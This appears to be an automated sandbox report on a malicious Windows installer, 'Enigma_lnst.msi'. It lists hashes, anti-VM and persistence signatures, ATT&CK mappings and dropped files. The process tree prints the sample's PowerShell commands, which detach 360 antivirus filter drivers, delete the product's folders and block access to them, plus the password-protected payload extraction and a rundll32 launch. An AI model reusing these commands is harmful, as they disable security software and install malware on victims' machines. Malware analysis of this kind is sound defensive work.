Overview

overview

9

Static

static

1

Enigma_lnst.msi

windows10-1703-x64

9

Enigma_lnst.msi

windows7-x64

9

Enigma_lnst.msi

windows10-2004-x64

9

Enigma_lnst.msi

windows11-21h2-x64

9

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/07/2024, 17:57

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Enigma_lnst.msi

  • Size

    186.9MB

  • MD5

    1befc9492cae2fa2ff5a89177e9d3063

  • SHA1

    061f689bb3802cf3da9cb5f8658beb5895d5650f

  • SHA256

    90cee7a2160a5506535b05a1da860b3db9270154a27b4614001a73921eb516f3

  • SHA512

    c199d79049af3c486fcbe35d6ae0825a8c2cae134fec4fe740c55c3677b29b7527958aaaf1c44890472af0a8d9e0e0db1ed96ca979da0619e089ff2486038243

  • SSDEEP

    3145728:L7y8IlnJhDfWQ3yIe3EPleGEHmdygafuvI2tc9XzlRn6lF+RQ+ZspLkOvnkBM+k6:i8oDfW6yIpPwGEHmdafuvXc9Bpe+S+6y

Score
9/10
defense_evasionevasionpersistenceprivilege_escalation

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Executes dropped EXE 3 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 1 TTPs 1 IoCs
    persistenceprivilege_escalation
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Enigma_lnst.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4120
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4616
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:4472
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 93DE0A49FCB79BBEE6CAD9CA24428C23
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\SysWOW64\cmd.exe" /c "fltmc.exe && exit 0||exit 1"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4104
          • C:\Windows\SysWOW64\fltMC.exe
            fltmc.exe
            4⤵
              PID:1936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360safe_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
            3⤵
            • Hide Artifacts: Ignore Process Interrupts
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'360sd_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
            3⤵
            • Hide Artifacts: Ignore Process Interrupts
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3624
          • C:\ProgramData\Data\un.exe
            "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar qbcore.dll C:\ProgramData\
            3⤵
            • Executes dropped EXE
            PID:3152
          • C:\ProgramData\Data\un.exe
            "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\
            3⤵
            • Executes dropped EXE
            PID:3012
          • C:\ProgramData\iusb3mon.exe
            "C:\ProgramData\iusb3mon.exe" false
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Checks computer location settings
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1516
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c echo.>c:\odbc.inst.ini
              4⤵
                PID:2104
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\ProgramData\qbcore.dll,cef_v8value_create_string
                4⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:4876
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo.>c:\inst.ini
                4⤵
                  PID:2184
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Checks SCSI registry key(s)
            • Suspicious use of AdjustPrivilegeToken
            PID:2640
          • C:\Windows\System32\rundll32.exe
            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            1⤵
              PID:2676

            Network

                  MITRE ATT&CK Enterprise v15

                  Reconnaissance

                  Resource Development

                  Initial Access

                  Execution

                  Persistence

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Event Triggered Execution

                  1
                  T1546

                  Installer Packages

                  1
                  T1546.016

                  Privilege Escalation

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Event Triggered Execution

                  1
                  T1546

                  Installer Packages

                  1
                  T1546.016

                  Defense Evasion

                  Hide Artifacts

                  1
                  T1564

                  Ignore Process Interrupts

                  1
                  T1564.011

                  Modify Registry

                  1
                  T1112

                  Virtualization/Sandbox Evasion

                  2
                  T1497

                  Credential Access

                  Discovery

                  Peripheral Device Discovery

                  2
                  T1120

                  Query Registry

                  7
                  T1012

                  System Information Discovery

                  6
                  T1082

                  Virtualization/Sandbox Evasion

                  2
                  T1497

                  Lateral Movement

                  Remote Services

                  1
                  T1021

                  Remote Desktop Protocol

                  1
                  T1021.001

                  Collection

                  Command and Control

                  Exfiltration

                  Impact

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Config.Msi\e57e020.rbs
                    Filesize

                    10KB

                    MD5

                    65d5af85679d97a938a6b16357b68473

                    SHA1

                    ac6389ab0a70232fb1d98d0c39f8ef606ffa8596

                    SHA256

                    af68e5eccb79d3b61f60bec508b06b3ebb242cac0819322fff84aeb3a025d8e1

                    SHA512

                    bbf9b913801e609b36a8703ee40b3f261f0db081a1af33365cdb7872ce4c4d4ef4287352b7208719842b4c20ebb9686ef5e8f3d4fbe3c658a2c9fe04015af9cb

                    Download Submit

                  • C:\ProgramData\Data\rar.ini
                    Filesize

                    10B

                    MD5

                    51c11db1054dd4650a33bf481ec27060

                    SHA1

                    17686b75163d8753be27e407aad97a76f311fc7b

                    SHA256

                    fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35

                    SHA512

                    94d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f

                    Download Submit

                  • C:\ProgramData\Data\un.exe
                    Filesize

                    601KB

                    MD5

                    4fdc31997eb40979967fc04d9a9960f3

                    SHA1

                    7f13bd62c13324681913304644489bb6b66f584a

                    SHA256

                    e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2

                    SHA512

                    15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a

                    Download Submit

                  • C:\ProgramData\Data\upx.rar
                    Filesize

                    2.3MB

                    MD5

                    6902353b10ae3b51d0d4dce6711bdc5e

                    SHA1

                    2c4abeda0be51037d90abdd22ce46660dc84a0fb

                    SHA256

                    525c842b1e10058e35b28593bcf2efd8b62e0587d5e0fc27e4289cdafaa9119a

                    SHA512

                    fb7d0590934ee8cb28dca9b4e0c3d2ee751ecfeeaaa5d399cc01c147c1ff051b58b23f88bced572000db8516ec47b84c6a6604131d69a6dd9e80c010b482b047

                    Download Submit

                  • C:\ProgramData\Microsoft\Program\ziliao.jpg
                    Filesize

                    356KB

                    MD5

                    fae472e4f35ea37d87ec8e75f8f87424

                    SHA1

                    dc4cecc39dcda0f27208d976f4c890aca60d38de

                    SHA256

                    ece4bdb4d10691514983e689e00fe376cd96d47b59c19d418514df6e075635b0

                    SHA512

                    6bdc5e60d917007c5970cde0fe0d8bdbaa6285e8351968bba0db5c42230448a2d6028e4f1d29bfbb72224a7bdc10c85d45614a113896d4eaebead949990df845

                    Download Submit

                  • C:\ProgramData\iusb3mon.exe
                    Filesize

                    604KB

                    MD5

                    75ff06aa5acfa803ad99b4fdcc43dd68

                    SHA1

                    8a120948f1e30fa8a2ef0d839c5300bbdfa9a8e4

                    SHA256

                    a09ee1f7481c2f215c3a1d2335c5181fcf52eea7c9d82bb885cb14dc419d4e51

                    SHA512

                    71216288e436dab8d824cd9eb300286095687d855f5beb4e2732a8ef90c7536fad2d82ee61373e85a65a8950ce5979757518578d522bad6bd8496b363b9ead3c

                    Download Submit

                  • C:\ProgramData\qbcore.dll
                    Filesize

                    2.7MB

                    MD5

                    c31ab7e7b6832f1b99d6914e1594eb6d

                    SHA1

                    ccc6f7e864548b9a7cbb5118c75e5f90db14ac5d

                    SHA256

                    3bda309984263aa5517dec01fbed324aaec44b514173aa7263cc9d2e0d2a5e73

                    SHA512

                    ff358abab061cc85bb1f51fc6a4a954f46bcf79863728c83b023cecfda2e7f4b61b8d30fe609af3f7bf01b2c23be417eb22f71d7e68b35749d78b85083469f99

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                    Filesize

                    1KB

                    MD5

                    def65711d78669d7f8e69313be4acf2e

                    SHA1

                    6522ebf1de09eeb981e270bd95114bc69a49cda6

                    SHA256

                    aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                    SHA512

                    05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    16KB

                    MD5

                    0e5c309790822c256e0386bae40fdb4d

                    SHA1

                    915d7770b22ed734cae57dcb50b403ccf5e23628

                    SHA256

                    92700714dc349086d41e7fd278e6366242eb745a93ce3dbcc7ab55dbf4fdd8cf

                    SHA512

                    2f8dd04ac522a5216688e236da9582911539d542daa7e139bc94974884d3aba435ac919f42a7106965778f2734c0b25f2a8f0731540900683b7b3d77da7ad58e

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enrcpinf.03h.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Windows\Installer\MSIE138.tmp
                    Filesize

                    990KB

                    MD5

                    b9ff2dd6924711531e59e90581cda548

                    SHA1

                    6c8d572587c40a1fd8c20bd4f1929bb0fbb12009

                    SHA256

                    ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7

                    SHA512

                    d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227

                    Download Submit

                  • C:\odbc.inst.ini
                    Filesize

                    2B

                    MD5

                    81051bcc2cf1bedf378224b0a93e2877

                    SHA1

                    ba8ab5a0280b953aa97435ff8946cbcbb2755a27

                    SHA256

                    7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

                    SHA512

                    1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

                    Download Submit

                  • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                    Filesize

                    23.7MB

                    MD5

                    cfd7b17cde52d2aabdafc5fbe8c22eca

                    SHA1

                    a739b299e81991c50f567b62795e715bb238f14e

                    SHA256

                    fc9b9c75ca9aa253627bf27ce87c77cfe51184153cfa9cd7febb24fbb97c7796

                    SHA512

                    0e5cda7c2699f8404e5b2b7086bda0619cf390737480a3aa019bff27f954f934c51365aae2915d405bf5a6e927d7da0b229a586b2a50c16720d51254be93fcdd

                    Download Submit

                  • \??\Volume{1a5e5195-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{cf028c4a-7b9b-4629-a2cb-55f6111428c0}_OnDiskSnapshotProp
                    Filesize

                    6KB

                    MD5

                    60655917a1eea18e7ba977ca59c86b26

                    SHA1

                    22c24567fd0121a2d6d214fe5011f937d7836606

                    SHA256

                    5bd39a2532199284b7ca66d88d6536a02784e879d922eaf968764b1899da2a30

                    SHA512

                    cd954f153ac5865c890d1d579c4086714a974c51f359c42e21714afc3e48ffe7491db1bef66a6a285a3da24d417037312451e0daf9cebe4cbcec2c838b789a73

                    Download Submit

                  • memory/1516-91-0x0000000074080000-0x0000000074339000-memory.dmp

                    Filesize

                    2.7MB

                    Download

                  • memory/1516-124-0x0000000074080000-0x0000000074339000-memory.dmp

                    Filesize

                    2.7MB

                    Download

                  • memory/1516-120-0x0000000074080000-0x0000000074339000-memory.dmp

                    Filesize

                    2.7MB

                    Download

                  • memory/1516-101-0x0000000010000000-0x0000000010061000-memory.dmp

                    Filesize

                    388KB

                    Download

                  • memory/3624-21-0x0000000005F00000-0x0000000006254000-memory.dmp

                    Filesize

                    3.3MB

                    Download

                  • memory/3624-58-0x0000000006A50000-0x0000000006A72000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/3624-15-0x0000000005E90000-0x0000000005EF6000-memory.dmp

                    Filesize

                    408KB

                    Download

                  • memory/3624-53-0x00000000074B0000-0x0000000007546000-memory.dmp

                    Filesize

                    600KB

                    Download

                  • memory/3624-13-0x0000000005500000-0x0000000005522000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/3624-57-0x0000000006A00000-0x0000000006A1A000-memory.dmp

                    Filesize

                    104KB

                    Download

                  • memory/3624-11-0x0000000002BB0000-0x0000000002BE6000-memory.dmp

                    Filesize

                    216KB

                    Download

                  • memory/3624-14-0x0000000005D30000-0x0000000005D96000-memory.dmp

                    Filesize

                    408KB

                    Download

                  • memory/4704-68-0x0000000007CB0000-0x0000000008254000-memory.dmp

                    Filesize

                    5.6MB

                    Download

                  • memory/4704-37-0x0000000006640000-0x000000000665E000-memory.dmp

                    Filesize

                    120KB

                    Download

                  • memory/4704-39-0x0000000006670000-0x00000000066BC000-memory.dmp

                    Filesize

                    304KB

                    Download

                  • memory/4704-12-0x0000000005850000-0x0000000005E78000-memory.dmp

                    Filesize

                    6.2MB

                    Download

                  • memory/4876-99-0x0000000074080000-0x0000000074339000-memory.dmp

                    Filesize

                    2.7MB

                    Download

                  • memory/4876-121-0x0000000074080000-0x0000000074339000-memory.dmp

                    Filesize

                    2.7MB

                    Download

                  • memory/4876-142-0x0000000074080000-0x0000000074339000-memory.dmp

                    Filesize

                    2.7MB

                    Download